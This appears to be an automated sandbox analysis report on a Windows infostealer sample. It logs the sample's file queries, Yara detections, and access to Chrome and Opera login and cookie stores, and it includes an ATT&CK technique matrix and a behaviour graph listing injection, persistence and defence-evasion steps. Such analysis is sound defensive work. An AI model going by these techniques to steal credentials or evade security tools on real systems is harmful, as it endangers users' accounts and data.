          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter
          1
          Scheduled Task/Job
          612
          Process Injection
          1
          Masquerading
          1
          OS Credential Dumping
          321
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Scheduled Task/Job
          Boot or Logon Initialization Scripts1
          Scheduled Task/Job
          11
          Disable or Modify Tools
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules
          Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Data from Local System
          Automated Exfiltration4
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer114
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items23
          Software Packing
          DCSync113
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626605 Sample: iuvRyl9i7D Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 48 www.zeavd.com 2->48 50 vip.myshopline.shop 2->50 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 11 other signatures 2->72 11 iuvRyl9i7D.exe 7 2->11         started        signatures3 process4 file5 40 C:\Users\user\AppData\...\dDqpEdJEtzi.exe, PE32 11->40 dropped 42 C:\Users\...\dDqpEdJEtzi.exe:Zone.Identifier, ASCII 11->42 dropped 44 C:\Users\user\AppData\Local\...\tmp280F.tmp, XML 11->44 dropped 46 C:\Users\user\AppData\...\iuvRyl9i7D.exe.log, ASCII 11->46 dropped 80 Uses schtasks.exe or at.exe to add and modify task schedules 11->80 82 Adds a directory exclusion to Windows Defender 11->82 84 Tries to detect virtualization through RDTSC time measurements 11->84 86 Injects a PE file into a foreign processes 11->86 15 iuvRyl9i7D.exe 11->15         started        18 powershell.exe 25 11->18         started        20 schtasks.exe 1 11->20         started        22 iuvRyl9i7D.exe 11->22         started        signatures6 process7 signatures8 88 Modifies the context of a thread in another process (thread injection) 15->88 90 Maps a DLL or memory area into another process 15->90 92 Sample uses process hollowing technique 15->92 94 Queues an APC in another process (thread injection) 15->94 24 explorer.exe 